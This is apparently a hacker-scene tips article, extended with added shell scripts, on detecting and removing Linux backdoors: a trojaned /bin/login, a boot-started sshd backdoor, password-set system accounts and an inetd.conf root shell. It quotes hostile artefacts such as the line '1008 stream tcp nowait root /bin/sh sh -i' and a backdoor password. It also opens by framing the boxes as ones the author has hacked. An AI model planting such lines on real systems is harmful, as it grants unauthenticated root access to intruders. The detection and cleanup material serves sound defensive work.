Tips: Removing Backdoors

Let me show you how to remove backdoors on a Linux box. Sometimes we find that
the shells we have just hacked are already hacked by some other hackers. Based on
my observation, there are a couple of common backdoors that hackers use on Linux
boxes:
/bin/login backdoor
sshd backdoor
/etc/passwd backdoor
Port backdoor
finger backdoor
/bin/login backdoor
To see whether your /bin/login is trojaned, run

strings /bin/login

On a trojaned box you will get a very short listing like this:

/lib/ld-linux.so.2
__gmon_start__
libc.so.6
getenv
execve
perror
system
__deregister_frame_info
strcmp
exit
_IO_stdin_used
__libc_start_main
__register_frame_info
GLIBC_2.0
PTRh
DISPLAY
/bin/.login - this is where the original /bin/login is now located
l33tp4ss - this is the login backdoor password
/bin/sh

The giveaways are the hidden dotfile path (the trojan passes normal logins
through to the real login kept there and drops anyone who supplies the password
into /bin/sh), the hardcoded password string, and the getenv/strcmp/DISPLAY
combination, which is how the trojan picks the password up from the
environment. A genuine /bin/login produces a much longer listing with many more
library symbols.

To remove the /bin/login backdoor, delete the trojan and move the original back:

rm /bin/login
mv /bin/.login /bin/login

Use whatever path the strings output showed as the moved original. Afterwards
check that /bin/login is still root-owned and mode 755 (ls -l /bin/login) and,
on an RPM-based box, that rpm -Vf /bin/login reports nothing. If the hidden copy
is missing or has been modified too, reinstall the package that owns /bin/login
rather than trusting what the hacker left behind.
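The same check and cleanup as a script, added here as an example that is not
part of the original tip. It emulates strings with tr so it needs only POSIX
tools, takes an optional root prefix so the restore can be rehearsed on a copy
of the tree, and builds its own constructed sample (not a real binary, just the
printable strings from the listing above separated by NUL bytes) for the demo.

```shell
#!/bin/sh
# Added example: detect and undo a /bin/login trojan of the kind shown above.

# Portable stand-in for `strings`: split the file on non-printable bytes and
# keep runs of four or more printable characters.
ascii_strings() {
    LC_ALL=C tr -c '[:print:]' '\n' < "$1" | LC_ALL=C grep -E '.{4,}'
}

# Print the first hidden (dot-prefixed) path under /bin, /sbin, /usr/bin or
# /usr/sbin embedded in the binary; that is where the trojan keeps the real login.
hidden_copy_path() {
    ascii_strings "$1" | grep -E '^/(usr/)?s?bin/\.[A-Za-z0-9_.-]+$' | head -n 1
}

# Return 0 if the binary carries the trojan's markers: a hidden copy path plus
# the getenv/DISPLAY/execve combination it uses to read the password and exec
# the real login. A genuine login never names a dotfile under /bin.
login_looks_trojaned() {
    s=$(ascii_strings "$1")
    printf '%s\n' "$s" | grep -q -E '^/(usr/)?s?bin/\.' || return 1
    printf '%s\n' "$s" | grep -q -x 'DISPLAY' || return 1
    printf '%s\n' "$s" | grep -q -x 'execve' || return 1
    return 0
}

# Delete the trojan at $1 and move the hidden original back over it. $2 is an
# optional root prefix (an assumption of this example, for rehearsing on a copy
# of the tree); leave it empty to work on the live system as root.
restore_login() {
    trojan=$1
    root=${2:-}
    hidden=$(hidden_copy_path "$trojan")
    [ -n "$hidden" ] || { echo "no hidden copy named in $trojan" >&2; return 1; }
    [ -f "$root$hidden" ] || { echo "hidden copy $root$hidden is missing" >&2; return 1; }
    rm -f "$trojan"
    mv "$root$hidden" "$trojan"
    chmod 755 "$trojan"
}

# Constructed sample: not a real binary, just the printable strings from the
# listing above separated by NUL bytes, with the hidden path given as $2.
write_sample_trojan() {
    printf 'ELF\000getenv\000execve\000system\000strcmp\000DISPLAY\000%s\000l33tp4ss\000/bin/sh\000' "$2" > "$1"
}

# Demo on a throwaway tree so nothing under the real /bin is touched.
# On a live box: login_looks_trojaned /bin/login && restore_login /bin/login
demo_root=$(mktemp -d)
mkdir -p "$demo_root/bin"
write_sample_trojan "$demo_root/bin/login" /bin/.login
printf 'original login\n' > "$demo_root/bin/.login"
if login_looks_trojaned "$demo_root/bin/login"; then
    echo "trojan markers found, hidden copy at $(hidden_copy_path "$demo_root/bin/login")"
    restore_login "$demo_root/bin/login" "$demo_root" && echo "restored"
fi
rm -rf "$demo_root"
```

The marker check is deliberately narrow: it only says "trojaned" when the
binary names a dotfile under a bin directory and reads DISPLAY, so a stripped
but legitimate login is not flagged. Run ls -l and rpm -Vf on the restored file
afterwards as described above.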
sshd backdoor

Detecting and removing this backdoor is a bit more technical. The backdoor sshd
runs in the background, so it will show up in ps aux unless ps itself is
trojaned (I'll write an article on detecting trojaned binaries soon). Another
way to check for an ssh backdoor is to look at the end of the boot script:

tail -5 /etc/rc.d/rc.sysinit

# Now that we have all of our basic modules loaded and the kernel going,
# let's dump the syslog ring somewhere so we can find it later
dmesg > /var/log/dmesg
/usr/info/.t0rn/sharsed - this line starts the ssh backdoor in the background at boot

On this box the real rc.sysinit ends with the dmesg line; anything appended
after it, especially a path with a hidden dot-directory in it, was added by the
intruder. Check /etc/rc.d/rc.local and /etc/inittab the same way, since those
are the other usual places to hook a start-up.

To remove the auto-start, delete the /usr/info/.t0rn/sharsed line from
rc.sysinit, then delete the binary and kill the running copy:

rm /usr/info/.t0rn/sharsed; killall -9 sharsed

Before you remove the /usr/info/.t0rn directory, look at what else is in it.
Afterwards confirm with ps aux and netstat -anp that the process and its
listening port are gone.
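A small script for the rc.sysinit check, added here as an example and not part
of the original tip. It reports every non-comment line in the given start-up
scripts that references a hidden path, removes a matching line while keeping a
backup, and demonstrates itself on a constructed copy of the rc.sysinit tail
quoted above (the extra comment line is made up to show that comments are
ignored).

```shell
#!/bin/sh
# Added example: find and remove an auto-start line like /usr/info/.t0rn/sharsed
# in the boot scripts.

# Print non-comment lines of the given scripts that reference a path with a
# hidden (dot-prefixed) component, as file:line:text. /dev/null is appended so
# grep always prints the file name, even when given a single script.
find_hidden_autostart() {
    grep -n -E '/\.[A-Za-z0-9_]' "$@" /dev/null \
        | grep -v -E '^[^:]*:[0-9]+:[[:space:]]*#' || :
}

# Remove every line containing the fixed string $2 from $1, keeping $1.bak.
remove_autostart_line() {
    cp -p "$1" "$1.bak"
    grep -v -F -- "$2" "$1.bak" > "$1" || :
}

# Constructed sample: the tail of rc.sysinit quoted above, plus a comment that
# mentions a hidden path to show that comments are not reported.
write_sample_sysinit() {
    printf '%s\n' \
        '# Now that we have all of our basic modules loaded and the kernel going,' \
        "# let's dump the syslog ring somewhere so we can find it later" \
        'dmesg > /var/log/dmesg' \
        '/usr/info/.t0rn/sharsed' \
        '# comment mentioning /etc/.pwd.lock, which is not a start-up line' > "$1"
}

# Demo on a copy. On a live box run:
#   find_hidden_autostart /etc/rc.d/rc.sysinit /etc/rc.d/rc.local /etc/inittab
#   remove_autostart_line /etc/rc.d/rc.sysinit /usr/info/.t0rn/sharsed
#   rm /usr/info/.t0rn/sharsed; killall -9 sharsed
demo=$(mktemp)
write_sample_sysinit "$demo"
echo "suspicious start-up lines:"
find_hidden_autostart "$demo"
remove_autostart_line "$demo" /usr/info/.t0rn/sharsed
echo "after removal: $(find_hidden_autostart "$demo" | wc -l) suspicious lines left"
rm -f "$demo" "$demo.bak"
```

The hidden-path pattern is a heuristic: read every hit before deleting it, as a
distribution script can legitimately mention a dotfile. Removing the line only
stops the next boot; the running process still has to be killed and its listener
checked with netstat -anp.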
/etc/passwd backdoor

Some hackers change the password of a system account that normally cannot log
in, such as games or operator, in order to keep local access. This backdoor is
easily detected: cat /etc/shadow. The original entries look like this

operator:*:11164:0:99999:7:::
games:*:11164:0:99999:7:::

while a backdoored one looks like

operator:$1$Qv0h4mTr$0dKXLXYIy74LH93tCTayU1:11179:0:99999:7:-1:-1:134537332

The difference is that the original entry has no encrypted password, just a *
in the password field, so nobody can log in as that account. The backdoored
entry has a real MD5 hash ($1$...) and a newer last-changed day (11179 against
11164), which shows the password was set after the box was installed.

To remove it, put the * back in the password field (in /etc/shadow, or in
/etc/passwd on a box without shadow passwords), or lock the account with
passwd -l operator. Check the other low-UID accounts the same way, and check
that their login shells in /etc/passwd have not been changed either.
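The shadow check as a script, added here as an example and not part of the
original tip. It joins /etc/passwd and /etc/shadow to list system accounts (UID
below a cut-off, 500 assumed as the Red Hat convention of the time) whose
password field is anything other than a locked marker, and puts the * back for
one account. The sample files are constructed from the lines quoted above; the
UIDs, the root and alice entries and their hashes are made up.

```shell
#!/bin/sh
# Added example: find system accounts that have been given a usable password,
# and lock one again.

# List accounts that PASSWD says are system accounts (uid below MINUID, root
# excluded) but whose SHADOW entry has a usable password: anything other than
# '*', '!' or '!!'. An empty field is flagged too, since it means no password.
system_accounts_with_password() {
    passwd=$1; shadow=$2; minuid=${3:-500}      # 500: assumed Red Hat cut-off of the era
    awk -F: -v min="$minuid" '
        NR == FNR { uid[$1] = $3; next }        # first file: passwd, remember uids
        $1 != "root" && ($1 in uid) && uid[$1] + 0 < min && $2 !~ /^[*!]/ { print $1 }
    ' "$passwd" "$shadow"
}

# Put '*' back in the password field of user $2 in shadow file $1, keeping $1.bak.
# On a live box prefer `passwd -l user`, which does the same through the proper tool.
lock_account() {
    cp -p "$1" "$1.bak"
    awk -F: -v OFS=: -v u="$2" '$1 == u { $2 = "*" } { print }' "$1.bak" > "$1"
}

# Constructed sample files: the operator and games lines are the ones quoted
# above; the uids, root and alice entries and their hashes are made up.
write_sample_files() {
    printf '%s\n' \
        'root:x:0:0:root:/root:/bin/bash' \
        'operator:x:11:0:operator:/root:' \
        'games:x:12:100:games:/usr/games:' \
        'alice:x:500:500::/home/alice:/bin/bash' > "$1"
    printf '%s\n' \
        'root:$1$abcdefgh$ijklmnopqrstuvwxyz01234:11164:0:99999:7:::' \
        'operator:$1$Qv0h4mTr$0dKXLXYIy74LH93tCTayU1:11179:0:99999:7:-1:-1:134537332' \
        'games:*:11164:0:99999:7:::' \
        'alice:$1$abcdefgh$ijklmnopqrstuvwxyz01234:11164:0:99999:7:::' > "$2"
}

# Demo on copies. On a live box: system_accounts_with_password /etc/passwd /etc/shadow
d=$(mktemp -d)
write_sample_files "$d/passwd" "$d/shadow"
echo "system accounts with a usable password:"
system_accounts_with_password "$d/passwd" "$d/shadow"
lock_account "$d/shadow" operator
echo "after locking: $(system_accounts_with_password "$d/passwd" "$d/shadow" | wc -l) left"
rm -rf "$d"
```

Raise the third argument if the box uses a different UID range for system
accounts; with 1000 the check would also list ordinary users, which is useful
for spotting an added account.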
Port backdoor

Hackers might also put a port backdoor in /etc/inetd.conf, such as

1008 stream tcp nowait root /bin/sh sh -i

This makes inetd hand anyone who connects to that port an interactive root
shell, with no password at all. Look for any entry whose server program is a
shell rather than a real daemon, and check /etc/services for an entry the hacker
may have added for the fake service name.

To remove it, delete the line from /etc/inetd.conf and restart inetd with

/etc/rc.d/init.d/inet restart

(or killall -HUP inetd, which makes it re-read its config). Then confirm with
netstat -an that nothing is listening on the port any more.
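An inetd.conf scanner for this case, added here as an example and not part of
the original tip. It parses the seven-field inetd.conf format and reports every
active entry whose server program, or any of its arguments (so a shell hidden
behind tcpd is caught too), is a shell. The sample config is constructed; the
ftp and telnet lines are typical entries of the era and the backdoor line is the
one quoted above.

```shell
#!/bin/sh
# Added example: find inetd.conf entries that hand the connection straight to a shell.

# inetd.conf fields: service socket-type protocol wait/nowait user server-program args
# Report, as file:line:text, every active entry where the server program or any
# argument is a shell (checked by basename, so /bin/sh and sh both count).
find_shell_services() {
    awk '
        /^[[:space:]]*#/ || NF == 0 { next }              # skip comments and blank lines
        {
            hit = 0
            for (i = 6; i <= NF && !hit; i++) {
                w = $i; sub(/.*\//, "", w)                # basename of program or argument
                if (w ~ /^(sh|bash|ksh|csh|tcsh|zsh|ash)$/) hit = 1
            }
            if (hit) print FILENAME ":" FNR ":" $0
        }
    ' "$@"
}

# Constructed sample: two ordinary wrapped services plus the backdoor line above.
write_sample_inetd() {
    printf '%s\n' \
        '# inetd.conf' \
        'ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a' \
        'telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd' \
        '1008 stream tcp nowait root /bin/sh sh -i' > "$1"
}

# Demo on a copy. On a live box: find_shell_services /etc/inetd.conf
demo=$(mktemp)
write_sample_inetd "$demo"
echo "entries that spawn a shell:"
find_shell_services "$demo"
rm -f "$demo"
```

Once an entry is confirmed, delete that line, restart inetd as described above
and check netstat -an; the service name in the first field also tells you which
/etc/services entry to look at.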
finger backdoor

I've no idea how to detect or remove this backdoor, sorry :)